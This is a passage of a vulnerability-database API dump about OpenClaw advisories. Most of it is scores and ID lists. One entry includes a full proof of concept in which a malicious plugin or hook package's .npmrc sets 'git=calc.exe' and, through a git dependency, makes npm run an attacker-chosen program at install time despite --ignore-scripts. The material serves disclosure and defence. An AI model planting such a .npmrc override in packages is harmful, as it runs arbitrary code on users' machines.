"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/464e2c10a5edceb380d815adb6ff56e1a4c50f60" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-4hmj-39m8-jwc7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35651", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35651" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.3", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" }, { "value": "5.3", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-14T14:29:21Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-ansi-escape-sequence-injection-in-approval-prompt" }, { "reference_url": "https://github.com/advisories/GHSA-4hmj-39m8-jwc7", "reference_id": "GHSA-4hmj-39m8-jwc7", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-4hmj-39m8-jwc7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-35651", "GHSA-4hmj-39m8-jwc7" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-bnfh-rsk9-cfea" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90992?format=api", "vulnerability_id": "VCID-brfj-4shr-qkgc", "summary": "OpenClaw has an Arbitrary Malicious Code Execution Vulnerability\n> Fixed in OpenClaw 2026.3.24, the current shipping release.\n\n### Summary\nDuring the installation phase of OpenClaw local plugins/hooks, the Git executable can be hijacked by a project-level .npmrc file, leading to arbitrary code execution during installation.\n\n### Details\nPlease note that the source code locations mentioned below are based on version openclaw-2026.3.13-1, but the issue has been confirmed to still exist in the current latest version, 2026.3.23.\n\nWhen installing a local plugin directory, local plugin archive, local hook pack directory, or local hook pack archive, OpenClaw first copies the source directory to a temporary `stageDir`, then executes the following in that directory:\n\n```\nnpm install --omit=dev --silent --ignore-scripts\n```\n\nSee `src/infra/install-package-dir.ts:176-199`.\n\nSince this process does not strip the project root `.npmrc`, and npm reads the project-level `.npmrc` during local project installation, an attacker could use a `.npmrc` file in a malicious plugin or hook directory to override npm’s `git` executable path. By leveraging a Git dependency, the attacker could trigger npm to call this malicious program, thereby executing arbitrary local code during the installation phase.\n\n**Affected Paths**\n\n- Plugin CLI entry point: `src/cli/plugins-cli.ts:199-255`\n- Hook CLI entry point: `src/cli/hooks-cli.ts:573-676`\n- Plugin local directory / archive installation: `src/plugins/install.ts:379-405`, `src/plugins/install.ts:541-565`\n- Hook local directory / archive installation: `src/hooks/install.ts:380-403`, `src/hooks/install.ts:443-470`\n- Actual execution of `npm install --ignore-scripts`: `src/infra/install-package-dir.ts:176-199`\n\n**Vulnerability Trigger Flow**\n\n1. The user executes one of the following commands:\n\n - `openclaw plugins install <path-or-spec>`\n - `openclaw hooks install <path-or-spec>`\n2. If the argument is a local directory or local archive, OpenClaw navigates to the local installation path.\n3. OpenClaw copies the source directory to a temporary `stageDir`. See `src/infra/install-package-dir.ts:176-177`.\n4. If `dependencies` are present in `package.json`, OpenClaw executes the following in `stageDir`:\n\n```\nnpm install --omit=dev --silent --ignore-scripts\n```\n\nSee `src/infra/install-package-dir.ts:188-199`.\n\n5. npm reads the project-level `.npmrc` file in this directory. Official documentation: [`.npmrc`](https://docs.npmjs.com/cli/v11/configuring-npm/npmrc/)\n6. If `.npmrc` is set to `git=<path to malicious program>` and there is a git dependency in the dependency tree, npm will invoke that `git` program when resolving the dependency. Official documentation: [`npm config git`](https://docs.npmjs.com/cli/v11/using-npm/config/) Git dependency documentation: [`package.json`](https://docs.npmjs.com/cli/v11/configuring-npm/package-json/)\n7. Consequently, an attacker can execute arbitrary local programs during the plugin/hook installation phase without waiting for the plugin or hook to be loaded later.\n\n**Triggering Commands**\n\n- Plugin installation command:\n\n```\nopenclaw plugins install <path-or-spec>\n```\n\n- Hook installation command:\n\n```\nopenclaw hooks install <path-or-spec>\n```\n\nWhen `<path-or-spec>` is a local directory or local archive, it will be resolved to the path used by the `npm install --omit=dev --silent --ignore-scripts` command mentioned above.\n\n### PoC\n\n\n\nCurrently, `testpoc/` is a minimal PoC directory used to verify that “when installing local packages, OpenClaw enters the `npm install --ignore-scripts` path.” It is divided into two core sections:\n\ntestpoc/pkg/\nPurpose: Simulates the local package directory installed by `openclaw plugins install ...` or `openclaw hooks install ...`\ntestpoc/repo/\nPurpose: Simulates a Git dependency repository within the npm dependency tree\nDirectory Structure\n\ntestpoc/\n├─ pkg/\n│ ├─ .npmrc\n│ ├─ package.json\n│ └─ sample-hook/\n│ ├─ HOOK.md\n│ └─ handler.js\n└─ repo/\n ├─ package.json\n └─ .git/...\nFunction of Each Component\n\ntestpoc/pkg/.npmrc\n\nCurrent content:\ngit=calc.exe\nFunction: Overrides npm’s Git executable configuration.\nMeaning: When npm encounters a git dependency during installation, it will not call the system git but will attempt to call the program specified here.\nThis is the core trigger point of this PoC. See testpoc/pkg/.npmrc:1\ntestpoc/pkg/package.json\n\nCurrently, this is a “mixed-use” manifest that includes both plugin and hook fields:\n{\n “name”: “probe-host”,\n “version”: “1.0.0”,\n “private”: true,\n “openclaw”: {\n “extensions”: [“./dist/index.js”],\n “hooks”: [“./sample-hook”]\n },\n “dependencies”: {\n “probe-git-dep”: “git+file:///D:/AI Agent Source/OpenClaw/openclaw-2026.3.13-1/.testpoc/repo”\n }\n}\nIts functionality is divided into three layers:\nopenclaw.extensions: Allows it to be validated as a plugin package\nopenclaw.hooks: Enables it to be validated as a hook package\nThe Git URL in dependencies: Forces npm to enter the Git dependency resolution path during installation\nSee testpoc/pkg/package.json:1\ntestpoc/pkg/sample-hook/HOOK.md\n\nPurpose: To meet the minimum metadata requirements for a hook package.\nThis is the key file that allows `openclaw hooks install pkg` to pass the pre-check. See testpoc/pkg/sample-hook/HOOK.md:1\ntestpoc/pkg/sample-hook/handler.js\n\nCurrent content:\nexport default async function handler() {\n return { ok: true };\n}\nPurpose: Meets the requirement that the hook directory must contain a handler entry file.\nIt is not a usage point in itself; its sole purpose is to allow OpenClaw to proceed to the dependency installation phase. See testpoc/pkg/sample-hook/handler.js:1\ntestpoc/repo/package.json\n\nCurrent content:\n{“name”:“probe-git-dep”,‘version’:“1.0.0”}\nPurpose: Serves as the minimum repository content corresponding to a Git dependency.\nThe focus is not on the repository code itself, but on the fact that “it is a Git repository,” allowing npm to perform Git-related operations on it. See testpoc/repo/package.json:1\ntestpoc/repo/.git/\n\nPurpose: Makes testpoc/repo/ a real Git repository rather than a regular directory.\nWhen npm resolves git+file://... When installing dependencies, this is treated as the Git source.\nHow the current PoC works\n\nIf installing via hooks:\n\nopenclaw hooks install testpoc/pkg\nThe trigger chain is:\n\nOpenClaw identifies testpoc/pkg as the local hook package path\nThrough pre-validation in openclaw.hooks, HOOK.md, and handler.js\nProceeds to src/infra/install-package-dir.ts:188-199\nExecutes:\nnpm install --omit=dev --silent --ignore-scripts\nnpm reads testpoc/pkg/.npmrc\nnpm processes the git dependency in package.json\nnpm attempts to call the git=calc.exe specified in .npmrc\n\n### Impact\nIt is best described as an installation-time local command execution / unsafe package-install configuration issue.\n\nMore precisely:\n\nOpenClaw installs local plugin and hook packs by running npm install --omit=dev --silent --ignore-scripts inside the staged package directory, see src/infra/install-package-dir.ts:188-199.\nIf that local package directory contains an attacker-controlled .npmrc, npm will still read it.\nIf .npmrc overrides npm’s git executable and the package has a git dependency, npm can invoke the attacker-chosen program during install.\n\nWho is impacted\n\nUsers who run:\n\nopenclaw plugins install <local path/archive>\nopenclaw hooks install <local path/archive>\n\nAnd who install a malicious or untrusted local package that includes:\n\na controlled .npmrc\na git dependency\na runnable attacker-controlled git target on that platform\n\nThis should be treated as a security issue, not just “malicious plugin behavior,” because the code execution happens during OpenClaw’s install workflow, before the plugin or hook is ever loaded as trusted runtime code.\n\nThe important distinction is:\n\nA normal “trusted plugin” case is: the operator installs a plugin, enables it, and later that plugin runs with plugin privileges.\nThis issue is different: OpenClaw’s installer executes npm install --omit=dev --silent --ignore-scripts inside an attacker-controlled package directory, and npm still honors attacker-controlled project config from .npmrc.\n\nThat means an untrusted local plugin or hook package can influence the package manager itself and reach arbitrary program execution at install time, via npm’s git setting and a git dependency, even though --ignore-scripts is present.\n\nWhy this matters from a security perspective:\n\nIt is install-time execution, not post-install trusted execution.\n\nThe execution is triggered by OpenClaw’s installer in src/infra/install-package-dir.ts:188-199.\n\nThis occurs before the package is accepted as a trusted loaded plugin/hook in the usual sense.\n\nIt defeats an expected safety boundary.\n\nThe code explicitly uses --ignore-scripts, which strongly suggests an intent to make installation safer.\n\nBut the installer still allows attacker-controlled package-manager configuration from .npmrc to affect execution.\n\nSo the current mitigation is incomplete in a security-relevant way.\n\nThe dangerous input is part of a supported user flow.\n\nOpenClaw explicitly supports installing plugins and hook packs from local directories and archives:\n\nsrc/cli/plugins-cli.ts:199-255\nsrc/cli/hooks-cli.ts:573-676\n\nThat makes “download a package/archive, then install it” a realistic operator action, not an artificial lab setup.\n\nThe issue is broader than plugin trust.\n\nThe problem is not “plugins can do bad things once trusted.”\n\nThe problem is “the installer consumes attacker-controlled package-manager config before trust is established.”\n\nThat is much closer to an unsafe install / supply-chain execution flaw than to ordinary trusted-plugin behavior.\n\nHooks are affected too.\n\nThe same installer path is used for hook packs, not only plugins.\n\nSo this is a shared install-surface issue, not an isolated plugin-runtime concern.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35641", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.0001", "scoring_system": "epss", "scoring_elements": "0.0119", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.0001", "scoring_system": "epss", "scoring_elements": "0.01189", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35641" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:30:45Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-m3mh-3mpg-37hw" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35641", "reference_id": "", "reference_type": "", "scores": [ { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35641" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.8", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" }, { "value": "8.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H" }, { "value": "8.4", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track*", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-14T14:30:45Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-arbitrary-code-execution-via-npmrc-in-local-plugin-hook-installation" }, { "reference_url": "https://github.com/advisories/GHSA-m3mh-3mpg-37hw", "reference_id": "GHSA-m3mh-3mpg-37hw", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-m3mh-3mpg-37hw" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/110567?format=api", "purl": "pkg:npm/openclaw@2026.3.24", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p3b-pfnn-x7ad" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-1smq-mbty-jkaj" }, { "vulnerability": "VCID-24m7-jx1g-hqde" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-294z-6z8j-97bx" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2hca-3v8f-f3e8" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2v8n-mnws-jfc9" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-32zs-2zs9-uufs" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-37ep-9smd-zuh9" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3bdd-a9nw-13bn" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4jwj-6s5z-wbeq" }, { "vulnerability": "VCID-4nwq-14y4-xkhp" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4uqc-3h1c-4yhs" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5atj-2a7b-57g5" }, { "vulnerability": "VCID-5dj5-mk23-kyds" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-66nc-bn98-nbas" }, { "vulnerability": "VCID-6849-th74-yqd5" }, { "vulnerability": "VCID-6bxd-kbse-sudx" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-8uzb-xmf8-hbca" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9uyu-y9qv-u7e1" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-9yxw-fj1c-tff9" }, { "vulnerability": "VCID-a2p8-ydn6-3bbr" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-acy1-83py-efhr" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-atn7-pn13-3fgb" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-aye6-1fwu-nkc5" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bg1d-gmxy-wkc6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bk76-1ctt-tkaw" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-bnfh-rsk9-cfea" }, { "vulnerability": "VCID-bzw7-yvu2-yqa2" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-csnc-r6fv-j3en" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-cwd3-ecym-sfaw" }, { "vulnerability": "VCID-d864-qy75-c3dx" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dbcw-brhj-k7hs" }, { "vulnerability": 